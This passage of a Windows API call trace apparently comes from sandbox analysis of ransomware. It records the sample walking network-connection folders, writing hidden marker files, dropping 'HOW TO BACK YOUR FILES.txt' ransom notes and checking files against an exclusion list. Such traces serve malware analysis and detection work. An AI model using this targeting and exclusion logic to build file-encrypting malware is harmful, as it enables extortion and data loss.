dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.884] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.884] CloseHandle (hObject=0x278) returned 1 [0052.884] CloseHandle (hObject=0x27c) returned 1 [0052.884] GetCurrentThreadId () returned 0xd98 [0052.884] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf64b0 [0052.884] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk" [0052.884] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106540 | out: hHeap=0xe0000) returned 1 [0052.884] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf64a8 | out: hHeap=0xe0000) returned 1 [0052.884] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk" [0052.884] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\" [0052.884] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\.BFC0E91B00AE8A0620D3" [0052.884] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.885] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.888] FlushFileBuffers (hFile=0x27c) returned 1 [0052.891] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.891] CloseHandle (hObject=0x27c) returned 1 [0052.891] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned 65 [0052.891] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.891] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2d8352f, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd38f794c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8d7e489, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0052.892] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.892] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.892] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.892] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.892] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2d8352f, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd38f794c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8d7e489, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.892] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.892] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.892] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.892] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.892] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.892] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8d7e489, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8d7e489, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8d7e489, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.892] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.892] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.892] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2d8352f, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc2d8352f, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc2d8352f, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_hiddenPbk", cAlternateFileName="_HIDDE~1")) returned 1 [0052.892] lstrcmpiW (lpString1="_hiddenPbk", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.892] lstrcmpiW (lpString1="_hiddenPbk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.892] lstrcmpiW (lpString1="_hiddenPbk", lpString2="Rabbit4444.exe") returned -1 [0052.892] lstrcmpiW (lpString1="_hiddenPbk", lpString2=".") returned 1 [0052.892] lstrcmpiW (lpString1="_hiddenPbk", lpString2="..") returned 1 [0052.892] lstrcmpiW (lpString1="_hiddenPbk", lpString2="windows") returned -1 [0052.892] lstrcmpiW (lpString1="_hiddenPbk", lpString2="bootmgr") returned -1 [0052.892] lstrcmpiW (lpString1="_hiddenPbk", lpString2="pagefile.sys") returned -1 [0052.892] lstrcmpiW (lpString1="_hiddenPbk", lpString2="boot") returned -1 [0052.892] lstrcmpiW (lpString1="_hiddenPbk", lpString2="ids.txt") returned -1 [0052.892] lstrcmpiW (lpString1="_hiddenPbk", lpString2="NTUSER.DAT") returned -1 [0052.892] lstrcpyW (in: lpString1=0x130ebbc, lpString2="_hiddenPbk" | out: lpString1="_hiddenPbk") returned="_hiddenPbk" [0052.892] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf64a8 [0052.892] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x9a) returned 0xf11e8 [0052.892] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf64b0 | out: ListHead=0xf68b0, ListEntry=0xf64b0) returned 0xea710 [0052.892] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2d8352f, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc2d8352f, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc2d8352f, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_hiddenPbk", cAlternateFileName="_HIDDE~1")) returned 0 [0052.893] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0052.893] lstrcpyW (in: lpString1=0x130ebbc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.893] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.893] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.893] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.893] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.893] CloseHandle (hObject=0x278) returned 1 [0052.893] CloseHandle (hObject=0x27c) returned 1 [0052.893] GetCurrentThreadId () returned 0xd98 [0052.893] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf64b0 [0052.893] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk" [0052.894] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf11e8 | out: hHeap=0xe0000) returned 1 [0052.894] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf64a8 | out: hHeap=0xe0000) returned 1 [0052.894] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk" [0052.894] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\" [0052.894] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\.BFC0E91B00AE8A0620D3" [0052.894] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.896] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.899] FlushFileBuffers (hFile=0x27c) returned 1 [0052.899] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.900] CloseHandle (hObject=0x27c) returned 1 [0052.900] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned 76 [0052.900] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.900] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2d8352f, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc2d8352f, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xe8da469d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0052.900] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.900] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.900] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.900] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.900] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2d8352f, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc2d8352f, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xe8da469d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.900] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.900] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.900] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.900] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.900] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.900] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8da469d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8da469d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8da469d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.901] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.901] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.901] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2d8352f, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc2d8352f, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc2d8352f, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rasphone.pbk", cAlternateFileName="")) returned 1 [0052.901] lstrcmpiW (lpString1="rasphone.pbk", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.901] lstrcmpiW (lpString1="rasphone.pbk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.901] lstrcmpiW (lpString1="rasphone.pbk", lpString2="Rabbit4444.exe") returned 1 [0052.901] lstrcmpiW (lpString1="rasphone.pbk", lpString2=".") returned 1 [0052.901] lstrcmpiW (lpString1="rasphone.pbk", lpString2="..") returned 1 [0052.901] lstrcmpiW (lpString1="rasphone.pbk", lpString2="windows") returned -1 [0052.901] lstrcmpiW (lpString1="rasphone.pbk", lpString2="bootmgr") returned 1 [0052.901] lstrcmpiW (lpString1="rasphone.pbk", lpString2="pagefile.sys") returned 1 [0052.901] lstrcmpiW (lpString1="rasphone.pbk", lpString2="boot") returned 1 [0052.901] lstrcmpiW (lpString1="rasphone.pbk", lpString2="ids.txt") returned 1 [0052.901] lstrcmpiW (lpString1="rasphone.pbk", lpString2="NTUSER.DAT") returned 1 [0052.901] lstrcpyW (in: lpString1=0x130ebd2, lpString2="rasphone.pbk" | out: lpString1="rasphone.pbk") returned="rasphone.pbk" [0052.901] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk", dwFileAttributes=0x0) returned 1 [0052.901] lstrlenW (lpString="rasphone.pbk") returned 12 [0052.901] lstrlenW (lpString="Rabbit4444") returned 10 [0052.901] lstrcmpiW (lpString1="sphone.pbk", lpString2="Rabbit4444") returned 1 [0052.901] lstrlenW (lpString=".dll") returned 4 [0052.901] lstrcmpiW (lpString1=".pbk", lpString2=".dll") returned 1 [0052.901] lstrlenW (lpString=".lnk") returned 4 [0052.901] lstrcmpiW (lpString1=".pbk", lpString2=".lnk") returned 1 [0052.901] lstrlenW (lpString=".ini") returned 4 [0052.901] lstrcmpiW (lpString1=".pbk", lpString2=".ini") returned 1 [0052.901] lstrlenW (lpString=".sys") returned 4 [0052.901] lstrcmpiW (lpString1=".pbk", lpString2=".sys") returned -1 [0052.901] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2d8352f, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc2d8352f, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc2d8352f, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rasphone.pbk", cAlternateFileName="")) returned 0 [0052.901] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0052.902] lstrcpyW (in: lpString1=0x130ebd2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.902] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.903] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.904] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.904] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.904] CloseHandle (hObject=0x278) returned 1 [0052.904] CloseHandle (hObject=0x27c) returned 1 [0052.904] GetCurrentThreadId () returned 0xd98 [0052.904] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xea710 [0052.904] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm" [0052.904] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1057c0 | out: hHeap=0xe0000) returned 1 [0052.904] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xea708 | out: hHeap=0xe0000) returned 1 [0052.904] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm" [0052.904] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm\\" [0052.904] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm\\.BFC0E91B00AE8A0620D3" [0052.904] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\network\\connections\\cm\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.905] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.908] FlushFileBuffers (hFile=0x27c) returned 1 [0052.909] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.909] CloseHandle (hObject=0x27c) returned 1 [0052.909] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm") returned 64 [0052.909] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.909] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae631a53, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae631a53, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xe8da469d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0052.910] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.910] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.910] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.910] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.910] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae631a53, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae631a53, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xe8da469d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.910] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.910] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.910] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.910] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.910] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.910] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8da469d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8da469d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8dca8c3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.910] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.910] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.910] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8da469d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8da469d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8dca8c3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.910] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0052.910] lstrcpyW (in: lpString1=0x130ebba, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.910] CreateFileW 